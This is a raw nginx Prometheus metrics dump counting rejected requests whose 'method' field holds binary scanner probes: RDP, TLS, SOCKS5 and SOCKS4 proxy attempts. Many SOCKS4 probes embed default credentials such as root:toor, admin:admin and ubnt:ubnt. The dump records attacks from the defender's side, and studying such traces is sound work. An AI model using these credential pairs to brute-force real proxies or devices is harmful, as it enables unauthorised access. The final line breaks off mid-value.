nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xEC\\xAC\\x8B\\x1A7\\xE0j\\xD2\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xF2\\xA2\\x99T\\x94\\xB9\\xD90\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xF6O:]\\xCA\\xFF?\\xF4\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xF6\\xB6\\xF5\\x19\\x93\\xE0\\xC9\\x07\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA,\\xBF\\xAE\\x9D\\x7F\\x9B\\xA5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA1e_\\x8D\\x16\\x9B|\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA\\xC5m\\xE7\\x0B\\x84\\xC2\\xFA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFBY\\xA3\\xAA4s\\xE4\\x83\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFB\\x99\\x9B\\xA3M\\x8E\\x10f\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFC\\xAF\\xF4\\xB6\\xE6&\\xB6\\x82\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x01\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x01\\x04\\x03\\x02\\x01\\x02\\x03\\xFF\\x01\\x00\\x01\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x01\\x82\\x00\\x00\\x00\\x01,\\xEF:\\xE7\\x89\\xFEH\\xAF\\xAC\\xF8\\xC1Pq\\xD7\\xC3\\xE8S\\x8A\\xD6:\\x17\\xD93\\x14o)S}\\xBB\\xBB\\x97b\\xCE\\xB6\\x0B\\x9B\\xB97>\\x01\\xCFv\\xAE\\xA0E\\xB6D\\xEA\\xE1\\xEAA\\xC4\\xDB\\xEE\\x09\\xAC\\xFB\\xF0\\x84)k\\xBBc\\x18]V\\x85V\\xC5_\\x05T\\x0Bt\\xC4\\x0B\\xBE\\xB5w\\xBCM=[1\\xE1\\x06\\x9C\\xFD\\xD3g^\\xE3\\x01\\x9BK\\xD7\\xFC>\\xFFk\\xAF\\x95\\x99\\xFB\\xDBH\\x90\\x8BD\\x88`k\\x92\\xF5e\\x1C\\xAA\\xBB{_LP\\x15\\x85\\x1E\\x0E\\x8F\\xDD\\xC5J",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00&!\\xE0\\x00\\x00\\xFE\\xCA\\x00Cookie:",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00+&\\xE0\\x00\\x00\\x00\\x00\\x00Cookie:",status="400",vhost="-"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00/*\\xE0\\x00\\x00\\x00\\x00\\x00Cookie:",status="400",vhost="-"} 296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00",status="400",vhost="-"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x02\\x00\\x00\\x00",status="400",vhost="-"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x01\\xD6",status="400",vhost="-"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x03\\x00\\x00\\x00",status="400",vhost="-"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x0B\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x0F\\x00\\x00\\x00",status="400",vhost="-"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x00\\x00\\x00\\x01\\x00example.com\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x01\\x01\\x01\\x01\\x00",status="400",vhost="-"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x08\\x08\\x08\\x08\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xB9\\xC2\\x8E\\x86\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%\\x00",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%admin:admin\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%admin:password\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%debian:debian\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%operator:operator\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:123456\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:root\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:toor\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%support:CxVn1geRkJQq0yUc\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%support:support\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%ubnt:ubnt\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%ubuntu:ubuntu\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%usario:usario\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%user:1234\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%user:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:1234\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:admin123\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15manager:manager\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15operator:operator\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:123456\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:abc123\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15support:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15support:support\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15upload:upload\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15user1:user1\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15uucp:uucp\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:123456\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:admin123\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:password\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19root:root\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19root:toor\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19support:support\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user1:user1\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:1234\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:user\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19view:view\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xD0_p\\x01\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x01\\x00\\x00\\x01\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x02\\x10\\x1Bb\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x02\\x10j\\x1E\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x22\\xA0o\\x91\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x22u;Q\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x8E\\xFA\\xB3\\xA4\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\xD4/\\xFA\\x0E\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x05\\x01\\x00",status="400",vhost="-"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x05\\x02\\x00\\x02",status="400",vhost="-"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x09\\x12;Bo3\\xA2D\\xFD\\x01\\x86si=\\xAE\\x12\\xBB\\xC6\\x19\\xFD\\x1A:\\xF3\\x11\\xC9\\xAE\\xDA<0\\xBC8\\x81\\x9E\\x00\\x0F\\xCAN\\xFB\\x05\\xC6\\xDE\\xB7